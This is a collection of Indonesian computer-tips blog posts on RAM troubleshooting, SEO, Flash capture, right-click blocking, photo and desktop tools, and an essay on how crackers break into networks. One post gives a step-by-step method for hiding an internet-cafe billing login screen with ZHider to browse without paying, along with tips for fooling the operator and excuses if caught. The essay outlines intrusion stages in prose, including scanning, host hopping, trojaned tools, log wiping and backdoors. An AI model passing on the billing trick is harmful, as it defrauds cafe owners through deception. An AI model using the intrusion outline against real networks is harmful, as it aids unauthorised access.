Mengatasi masalah pada RAM
Q : Mengapa Windows mendeteksi RAM yang lebih sedikit dari yang sesungguhnya ?
A : Ada banyak hal yang menyebabkan, diantaranya adalah :

"Kerusakan" fisik". Untuk mengatasinya Anda harus memeriksa kondisi fisik RAM tersebut. Buka casing komputer Anda, lalu cabut RAM tersebut. Bersihkan apabila RAM dan socketnya kotor. Periksa juga apakah ada karat. Anda juga harus memastikan bahwa RAM tersebut dari bahan yang sama (keemasan atau keperakan). Jika berbeda, sebaiknya Anda mengganti RAM tersebut.
ROM Shadowing Pada beberapa BIOS dan driver 16 bit, kadang-kadang memakai sebagian (baca : sedikit) RAM sebelum Windows dijalankan. Beberapa BIOS juga terdapat feature ROM shadowing yang akan mengcopy isi dari system dan video BIOS ROM ke RAM guna meningkatkan performa komputer (Pada DOS dan Windows 3.1 ). Hal ini karena kecepatan ROM lebih rendah dari RAM. Tetapi jika Anda memakai Windows 95/98/NT dengan memori yang minim sebaiknya feature ROM shadowing dimatikan saja (dari CMOS setup), karena Windows 95/98/NT jarang sekali mengakses ROM sehingga RAM tersebut dapat digunakan oleh Windows.
Penggunaan VGA card on board. Jika misalnya Anda memiliki RAM 32 Mb dan VGA card 2 Mb, maka RAM yang dapat digunakan hanya sebesar 30 Mb (32 Mb - 2 Mb). Jadi sebaiknya jangan memakai VGA card on board.
Terdapat driver atau program yang dijalankan dari config.sys atau autoexec.bat yang bekerja menggunakan RAM. Solusinya : Edit file autoexec.bat dan config.sys dengan menggunakan Notepad. Lalu editlah pada baris yang "mencurigakan" atau yang kira-kira digunakan untuk me-load program. Bila ketemu tambahkan kata REM (tetapi bila Anda menambahkan kata REM maka program tersebut tidak akan di-load/dijalankan). Bila Anda memakai driver CD-ROM 4x dari Teac, ubahlah parameter xmssize= -1 pada autoexec.bat menjadi xmssize=0.
Virtual device driver dijalankan dari system.ini. Untuk mengatasinya buka system ini dengan cara klik Start - Run - ketikkan sysedit. Pilih system.ini. Lalu editlah pada baris yang kira-kira digunakan untuk meload virtual device driver. Alternatif lainnya adalah dengan membuat file system.ini yang baru.
Terdapat baris Maxphyspage pada file system.ini Silakan lihat pada file system.ini, apakah terdapat baris Maxphyspage atau tidak. Jika ya, hapus baris tersebut.
Kesalahan pada CMOS setting. Pada beberapa komputer terdapat feature Memory Hole at 16 Mb atau Hold to 15 Mb RAM. Jika feature tersebut di enable maka jika Anda memiliki RAM yang lebih besar dari 15 Mb atau 16 Mb, Windows tetap akan mendeteksi sebesar 15 Mb atau 16 Mb. Untuk mengatasi hal ini, silakan di disable feature tersebut.
Meload Ramdrive.sys dari config.sys Check your Config.sys file for a line containing "Ramdrive.sys." If you have this line, it means you are using a RAM drive. To disable the RAM drive, remove or disable the line in the Config.sys file that contains "ramdrive.sys." To disable the line, use a text editor (such as Notepad) to edit the Config.sys file and place a semicolon (;) at the beginning of the line. Buka file config.sys dengan Notepad. Cek pada file tersebut, apakah terdapat baris ramdrive.sys. Jika ya, hapus baris tersebut

Q : Setelah menambah RAM, mengapa RAM yang terdeteksi masih sama ?
A : Setelah Anda menginstall RAM, Anda harus melakukan Setup BIOS ulang. Caranya, pada saat pertama kali menghidupkan komputer sampai muncul logo BIOS, tekan Del (untuk beberapa komputer mungkin Ctrl+Alt+Del atau kombinasi key yang lain). Setelah selesai, pilih Save Setting and Exit. Sebagai tambahan informasi untuk setting tersebut, Anda bisa membaca pada manul booknya.

Q : Mengapa terjadi error setelah saya menginstall RAM baru ?
A : Anda bisa melihat pada manual booknya. Untuk beberapa BIOS : Jika Anda menginstall (misalnya) 2-4 Mb SIMMS dan 2-8 Mb SIMMS, Anda harus meletakkan RAM yang lebih besar pada Bank 1.

Q : Setelah saya menginstall RAM baru, mengapa sering terjadi Blue Screen ?
A : Pada komputer yang menggunakan bus 66 MHz (Pentium 133 atau yang lebih tinggi), dibutuhkan RAM dengan kecepatan 60 ns atau yang lebih tinggi. Anda bisa saja menggunakan RAM dengan kecepatan yang lebih kecil dari 60 ns tapi Anda harus mengubah setting Wait State pada BIOS. Ubahlah setting tersebut dari 0 (nol) menjadi 1 (satu).

Q :Mengapa muncul tulisan Parity Check Error ?
A : Tulisan parity check error dapat muncul jika terdapat kerusakan pada salah satu RAM, salah satu proses DMA tidak berjalan dengan lancar, atau karena terdapat virus parity boot pada hard disk Anda.
Mencurangi Billing Warnet Dengan Zhider
Bagi para pemula yang lagi bokok tapi pengen online silahkan di baca. Buat mas-mas dan om-om yang merasa udah merasa pinter ato sudah tau caranya sangat disarankan untuk tidak usah membaca artikel ini karena hanya membuang-buang waktu anda yang sangat berharga.
Cara ini saya dapatkan pas kantong lagi kempes tapi nafsu online lagi tinggi :)
Setelah muter2 otak sebentar sambil tidur, akhirnya saya temukan cara buat ngakalin billing warnetnya buat ngirit ongkos online. Kalau cara yang ada di X-Code Magz vol4 itu cuma bisa untuk Billing Explorer (memang bisa, saya sudah membuktikannya).

Cara ini berlaku untuk segala versi billing explorer dan kebanyakan aplikasi billing lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis windows!!!
Penasaran mau tau caranya ? Baca aja sampai habis !
Sekali lagi saya ingatkan buat anda yang merasa udah pinter diharapap tidak usah baca, kecuali pengen mati kebosanan.
Ini dia caranya ...
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.
Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah... sudah tau apa yang bakal saya jelakan? Kalo sudah tau, berhenti aja bacanya. Daripada mati kebosanan :)
Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak program buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan program lain silakan baca manualnya, tapi yang perlu diperhatikan adalah program yang anda gunakan harus bisa show/hide window pake hotkey soalnya windows kita kan ditutupi sama login screen sialan itu.
Yang harus disiapkan:
Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, tidak sampe setengah isi disket, apalagi flashdisk.
Muka bego
Mental yang kuat
Langkah-langkahnya:
Masuk warnet dan pasang muka bego biar tidak dicurigai operator
Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar tidak dicurigai juga sih.
Usahakan cari tempat yang jauh dan operator, supaya tidak ketahuan box kamu kosong apa tidak.
Nyalakan komputer dihadapan kamu bila masih dalam keadaan mati.
Saat masuk login screen, login aja seperti biasa.
Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.
Setelah ZHider dijalankan langsung aja logout.
Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.
Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana:)
Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya tidak dicurigai.
Logout. Slapkan muka bego, lalu bayar tarif.
Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si operator sering keluyuran.
Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider
CTRL+ALT+Z : Menyembunyikan jendela aktif
CTRL+ALT+X : Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L : Menampilkan dialog zhider
CTRL+ALT+M : Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.
Kalo cara di atas tidak bisa dilakukan, hentikanlah usahamu. Sesungguhnya perbuatan jahatmu itu tidak diridhoi Tuhan :)
Kalo ketahuan langsung pertebal "muka bego"-mu. Misalnya bilang "Eh, kok jadi gini ya? Kemaren ga gini kok." Ato kata-kata lain, tergantung kreatifitas anda.
Penulis tidak bertanggung jawab atas kerugian yang ditimbulkan atas penggunaan artikel ini (Use at Your Own Risk).
Mengambil Objek Animasi Flash di Website
Anda tertarik dengan sebuah animasi flash yang ditampilkan di sebuah halaman web ? Bingung bagaimana mengambilnya ? Anda dapat menyalin file sumber animasi tersebut (.swf) ke dalam komputer dengan bantuan tool flash capture.

Download dan instal tool flash capture, misalnya http://flashcapture.zbsoft.net.
Jalankan Flash Capture, ketikkan URL halaman web yang mengandung animasi flash.
Proses pencarian file animasi di halaman web tersebut akan dilakukan. Hasilnya ditampilkan dalam daftar file di kolom kiri. Klik link namafile.swf yang ditemukan untuk mempreview. Klik Save atau Save as.
Periksa file hasil capture di folder C:\Program Files\Flash Capture\Temp\. Kini animasi flash yang Anda inginkan telah terkoleksi di komputer Anda.
Tip dan Trik Mempopulerkan Website di Search Engine ( Bagian 1 )
Benahi website Anda ! Apapun teknik dan trik optimasi search engine / SEO (Search Engine Optimization) yang Anda gunakan, semua tidak akan banyak membantu jika website Anda masih “bermasalah”. Ibarat ikut lomba balap, pastikan website Anda sudah fit dan lolos kualifikasi peserta lomba.

Saat ini banyak tersedia tool dan aplikasi pengembangan web yang siap membantu Anda menciptakan sebuah website secara mudah dan cepat. CMS juga sudah lazim digunakan untuk membangun website dengan fungsionalitas tertentu secara instan. Permasalahannya, tidak semua tool dan CMS yang bertebaran di internet mampu mendukung aspek SEO. Ya, sulit memang, kita harus memperhatikan aspek fungsionalitas website, kemudahan, kecepatan, sekaligus tetap memikirkan aspek SEO-nya.

Membuat website yang benar-benar sempurna memang sangat sulit dicapai. Namun, ada beberapa hal dasar yang perlu diperhatikan dalam merancang sebuah website agar dianggap layak tayang di search engine dan mampu bersaing di dunia maya. Kuncinya terletak pada kode-kode HTML yang ada di balik halaman web Anda.

1. Bagian HEAD Halaman Web

Berikut elemen-elemen penting di bagian HEAD dokumen HTML yang harus Anda perhatikan dalam merancang sebuah halaman web yang optimal :

TITLE

TITLE adalah judul website. Tag html TITLE berada di antara bagian HEAD halaman web. Judul website disisipkan di antara tag TITLE, misalnya Judul Halaman Web.

TITLE memiliki kontribusi yang sangat besar pada urutan hasil pencarian search engine.
Jangan biarkan website Anda tanpa TITLE, jangan asal pasrah dengan pemberian TITLE otomatis oleh software pengembangan website Anda, namun juga jangan berlebihan dengan TITLE Anda.
Seperti sebuah judul buku, usahakan TITLE Anda tuliskan secara ringkas namun mampu mencerminkan isi halaman web Anda. Pilih kata kata paling penting pada halaman web Anda, dan susun menjadi kalimat yang informatif.
Buat TITLE yang search engine friendly. Usahakan panjang TITLE Anda maksimal 60 karakter, karena jika terlalu panjang sebagian search engine akan mengabaikan apapun yang Anda tuliskan setelah 60 karakter.
META Tag

META adalah tag pada bagian HEAD halaman web, yang difungsikan untuk membantu search engine dalam memahami halaman web Anda. Susunan tag META diikuti NAME="jenis meta" dan CONTENT="isi meta". Ada beberapa jenis tag META yang dapat dicantumkan pada halaman web, namun hanya sedikit yang bisa diharapkan dalam mengoptimalkan website di search engine. Meskipun META awalnya sangat berpengaruh besar dalam membantu search engine generasi awal, namun dewasa ini sebagian besar search engine modern sudah mulai mengabaikan META dan lebih memperhatikan apa yang ada di dalam halaman web Anda.

META description : digunakan untuk mendeskripsikan isi halaman web. Bagian ini akan ditampilkan search engine bersama TITLE pada halaman hasil pencarian. Ada salah anggapan bahwa META description dapat memompa ranking situs di search engine, sehingga lazimnya pembuat website berusaha mengetikkan informasi sebanyak-banyaknya agar dapat disambar search engine ketika seseorang mengetikkan keyword terkait. Ingat, search engine saat ini lebih memperhatikan kesesuaian antara TITLE, META, dan seluruh informasi di dalam halaman web Anda. Usahakan panjang META ini search engine friendly, sebagian menyarankan 150 karakter, sebagian 120 karakter, karena hanya sepanjang karakter inilah informasi yang akan ditampilkan di halaman hasil pencarian. Sisanya ? mubazir, karena akan dipotong.
META keywords : digunakan untuk menyebutkan sejumlah kata kunci yang berkaitan dengan website Anda. Setiap kata kunci yang disebutkan dipisah dengan tanda koma. Usahakan META keywords hanya mengandung kata yang memang tampil di halaman web (teks terbaca di browser). Sama seperti META description, salah anggapan juga terjadi pada META ini. Mengapa ? karena sekarang search engine sudah tidak mengindeks teks yang ada di META keywords. Anda tetap dapat menggunakannya dan akan sedikit membantu jika memakainya secara tepat. Batasi panjang maksimal teks keywords sekitar 800 karakter-an dan jangan ulang pencantuman sebuah kata yang sama hingga lebih dari tiga kali. Ya, sebab ini berkaitan dengan yang namanya keyword density, salah satu faktor perhitungan yang mempengaruhi ranking website di search engine. Perulangan kata pada META keyword dapat Anda ibaratkan over dosis, yang hanya akan meracuni ranking website Anda.
META robots : digunakan untuk menentukan apakah halaman web yang dipasangi META ini boleh diindeks oleh search engine, atau sebaliknya. META ini cukup membantu untuk menghindari munculnya halaman-halaman tertentu pada hasil pencarian search engine.
META lain (misalnya META author dan META copyright), tidak banyak membantu posisi website Anda di search engine. Penggunaannya optional sesuai kebutuhan, misalnya META author dan copyright dapat Anda prioritaskan jika ingin menyatakan secara eksplisit bahwa halaman web yang Anda sisipi adalah karya cipta Anda.
2. Bagian BODY Halaman Web

Beberapa elemen penting di bagian BODY yang harus Anda perhatikan adalah :

Heading

Heading adalah tag bagi penulisan elemen judul, sub judul, dan subsub selanjutnya pada materi halaman web. Penulisannya sebagai berikut ‹h#› isi judul ‹/h#›. ‹h1› adalah heading 1, ‹h2› adalah heading 2, dan seterusnya (# adalah level heading).

Tag heading adalah bagian yang paling dilirik search engine setelah tag TITLE. Biasakan untuk menuliskan judul dan sub judul di dalam halaman web Anda menggunakan tag heading. Meskipun secara visual tampak sama di browser, sebaris kata yang diberi tag heading dan sebaris kata yang diperbesar ukuran fontnya memiliki kualitas yang berbeda di mata search engine.

Link

Link yang menghubungkan antar halaman web Anda juga memiliki poin tersendiri. Ini bukan soal ke mana link Anda lari, namun soal penulisan teks link dan atribut yang Anda sisipkan di dalam link. Link dan teks-teks yang menyertai link Anda juga menjadi perhatian search engine.

Tuliskan kata atau kalimat yang mencerminkan isi dan maksud link. Sebaris anchor / teks link “daftar buku komputer terbaru” jauh lebih berkualitas dibandingkan sebaris anchor / teks link “silakan klik di sini” atau sebuah gambar buku yang Anda beri link.
URL tujuan link yang bermakna juga lebih baik dibandingkan URL tujuan dalam susunan tak bermakna. Misalnya susunan URL http://www.smitdev.com/buku/pemesanan-buku.php lebih bagus dibandingkan susunan URL
http://www.situs.com/?p=dabk&sJRG=new
(atau sederet kode dan singkatan yang mungkin membuat Anda bertanya-tanya apa maksudnya). URL berbentuk kode-kode ini merupakan hasil pemanggilan halaman yang tersimpan dalam database. Untuk menghindari munculnya URL seperti itu, kita bisa memakai mod_rewrite dari web server Apache Anda (baca tutorial mod_rewrite di sini).
Tambahkan link title saat mendiskripsikan sebuah link. Contoh susunannya adalah sebagai berikut : ‹a href=http://www.smitdev.com/buku/profil-penulis.php title="daftar penulis buku smitdev"›Daftar Penulis‹/a›. Bagian title="daftar penulis buku smitdev" inilah yang disebut link title. Sebaris kalimat yang menjelaskan tentang tujuan link ini sedikit dapat membantu posisi Anda di search engine untuk pencarian dengan keyword terkait.
Konten Website

Konten yang dimaksud di sini adalah semua objek website yang dapat dilihat orang pada web browser.

Teks : Hanya bagian inilah sebenarnya yang diindeks oleh search engine. Teks yang terbaca search engine bisa berupa paparan informasi yang Anda ketikkan di halaman web, atau atribut ALT yang menyertai gambar. Untuk memeriksa materi teks halaman web Anda, silakan matikan gambar melalui menu Options / Preferences di browser, lalu refresh tampilan Anda. Nah, itu yang diindeks search engine.
Gambar dan objek non teks lain : Gambar dan objek non teks lain tidak akan diindeks oleh search engine. Teks yang tertulis di dalam sebuah gambar pun tidak akan terbaca oleh search engine. Jadi meskipun gambar slogan dan gambar dominan lain akan membuat website Anda cantik, namun ini sama sekali tidak akan membantu Anda di search engine. Jika halaman web Anda menuntut adanya beragam gambar, sebaiknya siasati dengan menyisipkan atribut ALT pada kode HTML penyisipan gambar Anda. Contohnya ‹IMG SRC="http://www.smitdev.com/kerjasama_kemitraan.png" ALT="Kerjasama Kemitraan" WIDTH="53" HEIGHT="22" /›. Nah, sekarang dapat dua-duanya, gambar yang cantik akan tampil, dan search engine pun akan mengindeks kata “Kerjasama Kemitraan” yang Anda sisipkan dalam ALT.
Kesesuaian kandungan materi informasi dan karakteristik tema sebuah halaman web sangat membantu posisi Anda di search engine. Situs Anda bertema hardware, elemen TITLE dan META website sudah Anda arahkan ke tema hardware, tapi jika isi website Anda sendiri lebih banyak membahas soal software, ya digeser deh posisi website Anda oleh situs hardware pesaing. Search engine juga akan menghitung jumlah suatu kata yang ada di halaman Anda dan mencocokkannya dengan keyword yang diketikkan sang pencari.
Teks memang idola search engine, tapi jangan coba-coba menipu search engine dengan cara mengetikkan sekelompok kata unggulan Anda dalam ukuran font terkecil atau dalam warna yang sama dengan warna latar. Mungkin Anda berpikir ini ideal, di satu sisi semakin banyak kata unggulan yang dapat Anda sisipkan, di sisi lain Anda dapat menyembunyikan dan tidak ingin merusak pemandangan situs Anda dengan segudang kata yang akan membingungkan pengunjung. Ingat tindakan yang termasuk dalam kategori spamdexing ini menyalahi aturan dan bisa berakibat fatal, situs Anda dilarang dan dihapuskan dari database search engine. Sanksi atas kasus seperti ini sempat menimpa situs besar BMW dan Ricoh pada Februari 2006, walaupun akhirnya keduanya dimaafkan dan memperbaiki kesalahan ini.
Baik, silakan benahi dulu website Anda sebelum kita lanjutkan ke tip-tip optimasi search engine selanjutnya. Merepotkan ? memang, …no pain no gain! Jika tidak mau repot, ya selamat menikmati sendiri website Anda, heheh…!
Tidak Bisa Klik Kanan?
Seringkali kita menemukan website yang disana kita tidak bisa klik kanan. Tujuannya seperti biasa untuk mencegah user mencopas (copy paste) artikel tersebut. Ya biasalah masalah copyright atau hak cipta. Apakah ini salah! saya nggak mau ngomong ini benar atau itu salah, karena saya juga nggak ngerti apa-apa. Kita lebih baik bahas bagaimana menggunakan script klik kanan dan cara mengatasi script yang bertujuan disable klik kanan itu. Ayo lanjut bang……..

Cara Mengatasi Anti Klik Kanan
Karena script anti klik kanan biasanya menggunakan javascript maka tinggal kita disable saja javascript. Otomatis browser tidak akan mengeksekusi kodenya script anti klik kanan pun hanya menjadi macan ompong. Caranya

Untuk Firefox : Klik tools-Options-Pilih tab content-uncheck enable javascript- klik OK!
Untuk IE: Klik tools-Internet Option-Advance- disable pada browsing
Untuk browser lain tinggal menyesuaikan
Namun pada firefox sendiri ada cara khusus mengatasi tidak bisa klik kanan ini, tanpa mengganggu kode javascript yang lain. Mau tahu caranya? Ikuti saja rangkaian kata-kata berikut ini :

Untuk Firefox : Klik tools- Options – Pilih tab content – Advanced – lalu uncheck Disable or replace context menus
Tapi bagi yang nggak suka menonaktifkan javascript dapat menggunakan trik mouse berikut untuk mengakali script anti klik kanan:

Coba kombinasikan klik kiri dengan kanan, lakukan secara cepat. Klik kiri terus klik kanan, lalu klik kiri pokoknya yang terakhir harus klik kanan. Jika berhasil maka otomatis anda tidak lagi tidak bisa klik kanan bahkan tanpa mendisable javascript.
Jika mouse mempunyai fasilitas rollover (Saya lupa namanya pokoknya bundaran kecil untuk menggulung layar kebawah). Coba fasilitas itu di tekan lalu kemudian klik kanan. Apa yang terjadi? 50 % berhasil dan %0 persen gagal.
Memasang Script Klik Kanan
Sedangkan bagi anda yang ingin supaya content blog/website anda tidak di copas. Gunakan saja script dibawah ini supaya user tidak bisa klik kanan.



Tapi jika ingin lebih lagi gunakan scriptdibawah ini. Selain mendisable klik kanan juga mendisable seleksi. Jadi boro-boro mau klik kanan, seleksi aja nggak bisa,

Silahkan tulis script dibawah ini (lebih baik ditulis khusus pada file js yang terpisah)



Kode diatas tidak akan dieksekusi sebelum anda menulis kode dibawah ini :



Nah bagaimana selain user tidak bisa klik kanan juga tidak bisa seleksi. Pertanyannya adalah apakah script diatas akan mampu benar-benar melindungi blog saya dari pencurian konten? Tentu saja tidak lihat artikel saya diatas bahwa sekali java script dimatikan ya udah selesai.

Tapi tenang mengingat pengguna internet di indonesia yang masih katrok-katrok, ya saya rasa trik men disable klik kanan dan bahkan seleksi diatas masih sangat manjur
Mengolah Foto Secara Online Dengan BeFunky.com

Untuk membuat sebuah tampilan foto menjadi lebih menarik Anda tidak harus menguasai software Photoshop. Yang Anda perlukan hanyalah koneksi internet dan situs yang memberikan layanan olah foto gratis.

Salah satu situs yang menyediakan layanan olah foto gratis yang cukup menarik adalah BeFunky.com. Sesuai dengan namanya, dengan BeFunky.com Anda dapat mengolah foto Anda sehingga tampil lebih funky. Ada cukup banyak pilihan efek foto yang bisa Anda pilih, misalnya old photo untuk membuat foto berkesan klasik, cartoonizer untuk “mengkartunkan” foto, dll.

Untuk menggunakan layanan ini caranya cukup mudah:

1. Setelah Anda masuk ke situs BeFunky.com, klik tombol Get Started.
2. Selanjutnya Anda pilih efek foto yang Anda inginkan. Ada beberapa pilihan, misalnya old photo, pop art, cartoonizer, dsb.
3. Jika Anda ingin mengolah foto yang ada di komputer Anda, klik tombol Browse Files.
4. Setelah proses pengolahan foto selesai, Anda bisa melihat hasilnya. Kalau Anda sudah puas dengan hasilnya, Anda bisa klik tombol Save. Jika masih belum puas, Anda bisa mencoba efek-efek lain dengan mengklik pilihan efek di sebelah kiri.
5. Selesai.

Setelah selesai, Anda bisa menggunakan foto hasil olahan tersebut sebagai avatar atau foto profil di facebook :)
Mempercantik Desktop Dengan Rainmeter

Mempercantik Desktop Dengan Rainmeter



Rainmeter merupakan software gratis untuk menampilkan berbagai informasi system seperti CPU, RAM, koneksi jaringan, weather, playlist, dll dalam bentuk widget. Tidak sekedar menampilkan informasi saja, widget tersebut sekaligus akan mempercantik tampilan desktop Anda.



Dalam Rainmeter versi terbaru disertakan skin Enigma, salah satu skin Rainmeter paling populer. Anda dapat mendownload Rainmeter di http://rainmeter.net/.


Beberapa contoh tampilan Rainmeter:





Jika Anda membutuhkan skin tambahan untuk Rainmeter, Anda dapat mencarinya di:




Artikel Mempercantik Desktop Dengan Rainmeter ini dipersembahkan oleh Klik-Kanan.com. Kunjungi Klik-Kanan.com untuk informasi seputar komputer dan internet.

Belajar Menjadi Hacker

Belajar Menjadi Hacker


Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan - mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.


Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik - jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut - karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.



Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.linuxdoc.org, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.


Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/. Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini - tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id.


Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.


Dijelaskan oleh Front-line Information Security Team, ”Techniques Adopted By ’System Crackers’ When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk. Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 - karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.


Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.


Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).


Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.


Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah ’ls ’ , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah ’expn ’, dan (5) mem-finger user di mesin-mesin eksternal lainnya.


Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.


Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti ’ps’ & ’netstat’ di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.


Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ’root’ (administrator tertinggi di server).


Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan ’clean-up’ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang ’backdooring’. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.


